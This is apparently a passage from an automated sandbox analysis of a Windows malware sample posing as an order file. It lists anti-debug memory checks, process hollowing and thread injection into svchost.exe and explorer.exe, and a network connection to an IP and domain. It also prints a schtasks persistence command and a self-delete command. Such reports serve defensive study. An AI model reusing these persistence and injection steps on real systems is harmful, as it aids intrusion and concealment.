          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3131B mov eax, dword ptr fs:[00000030h]17_2_01A3131B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197F358 mov eax, dword ptr fs:[00000030h]17_2_0197F358
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197DB40 mov eax, dword ptr fs:[00000030h]17_2_0197DB40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A3B7A mov eax, dword ptr fs:[00000030h]17_2_019A3B7A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A3B7A mov eax, dword ptr fs:[00000030h]17_2_019A3B7A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197DB60 mov ecx, dword ptr fs:[00000030h]17_2_0197DB60
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48B58 mov eax, dword ptr fs:[00000030h]17_2_01A48B58
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AD294 mov eax, dword ptr fs:[00000030h]17_2_019AD294
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AD294 mov eax, dword ptr fs:[00000030h]17_2_019AD294
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198AAB0 mov eax, dword ptr fs:[00000030h]17_2_0198AAB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198AAB0 mov eax, dword ptr fs:[00000030h]17_2_0198AAB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AFAB0 mov eax, dword ptr fs:[00000030h]17_2_019AFAB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2ACB mov eax, dword ptr fs:[00000030h]17_2_019A2ACB
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2AE4 mov eax, dword ptr fs:[00000030h]17_2_019A2AE4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197AA16 mov eax, dword ptr fs:[00000030h]17_2_0197AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197AA16 mov eax, dword ptr fs:[00000030h]17_2_0197AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01993A1C mov eax, dword ptr fs:[00000030h]17_2_01993A1C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov eax, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov ecx, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov eax, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov eax, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01988A0A mov eax, dword ptr fs:[00000030h]17_2_01988A0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3AA16 mov eax, dword ptr fs:[00000030h]17_2_01A3AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3AA16 mov eax, dword ptr fs:[00000030h]17_2_01A3AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B4A2C mov eax, dword ptr fs:[00000030h]17_2_019B4A2C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B4A2C mov eax, dword ptr fs:[00000030h]17_2_019B4A2C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2B260 mov eax, dword ptr fs:[00000030h]17_2_01A2B260
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2B260 mov eax, dword ptr fs:[00000030h]17_2_01A2B260
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48A62 mov eax, dword ptr fs:[00000030h]17_2_01A48A62
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B927A mov eax, dword ptr fs:[00000030h]17_2_019B927A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3EA55 mov eax, dword ptr fs:[00000030h]17_2_01A3EA55
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A04257 mov eax, dword ptr fs:[00000030h]17_2_01A04257
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AFD9B mov eax, dword ptr fs:[00000030h]17_2_019AFD9B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AFD9B mov eax, dword ptr fs:[00000030h]17_2_019AFD9B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A405AC mov eax, dword ptr fs:[00000030h]17_2_01A405AC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A405AC mov eax, dword ptr fs:[00000030h]17_2_01A405AC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A1DB5 mov eax, dword ptr fs:[00000030h]17_2_019A1DB5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A1DB5 mov eax, dword ptr fs:[00000030h]17_2_019A1DB5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A1DB5 mov eax, dword ptr fs:[00000030h]17_2_019A1DB5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A35A1 mov eax, dword ptr fs:[00000030h]17_2_019A35A1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A28DF1 mov eax, dword ptr fs:[00000030h]17_2_01A28DF1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov ecx, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198D5E0 mov eax, dword ptr fs:[00000030h]17_2_0198D5E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198D5E0 mov eax, dword ptr fs:[00000030h]17_2_0198D5E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48D34 mov eax, dword ptr fs:[00000030h]17_2_01A48D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3E539 mov eax, dword ptr fs:[00000030h]17_2_01A3E539
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4D3B mov eax, dword ptr fs:[00000030h]17_2_019A4D3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4D3B mov eax, dword ptr fs:[00000030h]17_2_019A4D3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4D3B mov eax, dword ptr fs:[00000030h]17_2_019A4D3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197AD30 mov eax, dword ptr fs:[00000030h]17_2_0197AD30
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019FA537 mov eax, dword ptr fs:[00000030h]17_2_019FA537
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01997D50 mov eax, dword ptr fs:[00000030h]17_2_01997D50
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B3D43 mov eax, dword ptr fs:[00000030h]17_2_019B3D43
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F3540 mov eax, dword ptr fs:[00000030h]17_2_019F3540
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A23D40 mov eax, dword ptr fs:[00000030h]17_2_01A23D40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199C577 mov eax, dword ptr fs:[00000030h]17_2_0199C577
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199C577 mov eax, dword ptr fs:[00000030h]17_2_0199C577
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198849B mov eax, dword ptr fs:[00000030h]17_2_0198849B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe; Domain query: www.filmarabia.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Memory written: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\svchost.exe; Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1130000
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Process created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe {path}
          Source: C:\Windows\SysWOW64\svchost.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
          Source: explorer.exe, 00000012.00000000.307222861.0000000001398000.00000004.00000020.sdmp; Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000012.00000000.308124549.0000000001980000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000012.00000000.308124549.0000000001980000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000012.00000000.308124549.0000000001980000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.475664025.00000000045D0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
